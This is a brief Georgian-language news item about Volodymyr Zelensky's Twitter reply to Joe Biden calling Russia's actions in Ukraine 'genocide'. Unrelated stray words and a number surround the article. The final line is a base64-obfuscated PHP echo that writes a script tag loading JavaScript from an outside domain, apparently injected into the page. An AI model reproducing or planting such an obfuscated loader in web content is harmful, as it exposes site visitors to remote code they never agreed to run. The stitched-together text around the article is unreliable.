celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი აშშ-ის პრეზიდენტ ჯო ბაიდენის მიერ უკრაინაში ომთან დაკავშირებით სიტყვა „გენოციდის“ გამოყენებას სოციალურ გამოეხმაურა და დაწერა, რომ მოვლენებისთვის სახელის დარქმევა მნიშვნელოვანია ბოროტების დასაძლევად. 
 
„მოვლენებისთვის სახელის დარქმევა მნიშვნელოვანია, რომ წინ აღვუდგეთ ბოროტებას. მადლიერი ვართ იმ დახმარებისთვის, რასაც ამერიკის შეერთებული შტატები გვიწევს და სასწრაფოდ გვესაჭიროება უფრო მძიმე შეიარაღება, რათა აღვკვეთოთ რუსეთის შემდეგი სისასტიკე“, – წერს უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი მიკრობლოგ „ტვიტერზე“.
 
შეგახსენებთ, რომ ამერიკის შეერთებული შტატების პრეზიდენტმა, ჯო ბაიდენმა გუშინ უკრაინაში რუსეთის მიერ ჩადენილი ქმედებები „გენოციდად“ შეაფასა. 
730
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");